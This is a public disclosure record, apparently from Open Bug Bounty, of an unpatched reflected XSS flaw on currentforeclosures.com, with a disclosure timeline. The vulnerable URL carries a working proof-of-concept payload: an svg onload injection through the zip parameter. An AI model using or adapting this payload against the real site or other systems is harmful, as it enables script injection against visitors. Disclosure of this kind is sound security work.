logo
DATABASE RESOURCES PRICING ABOUT US

currentforeclosures.com XSS vulnerability

Description

##### Vulnerable URL: http://www.currentforeclosures.com/e/properties.php?rr=Ispire2newSingle&siteName;=USA%20Foreclosure%20List&zip;=1%22--%3E%3Csvg/onload=;prompt(/OPENBUGBOUNTY/);%3E38916&address;= ##### Details: Description| Value ---|--- Patched:| No Latest check for patch:| 27.07.2017 Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank| 1099680 VIP website status:| No Check currentforeclosures.com SSL connection:| (Grade: C) ##### Coordinated Disclosure Timeline: Description| Value ---|--- Vulnerability submitted via Open Bug Bounty| 22 June, 2016 14:25 GMT Generic security notifications sent to website owner| 22 June, 2016 14:28 GMT Notification sent to subscribers (without technical details)| 22 June, 2016 18:17 GMT Vulnerability details disclosed by researcher| 20 July, 2016 15:11 GMT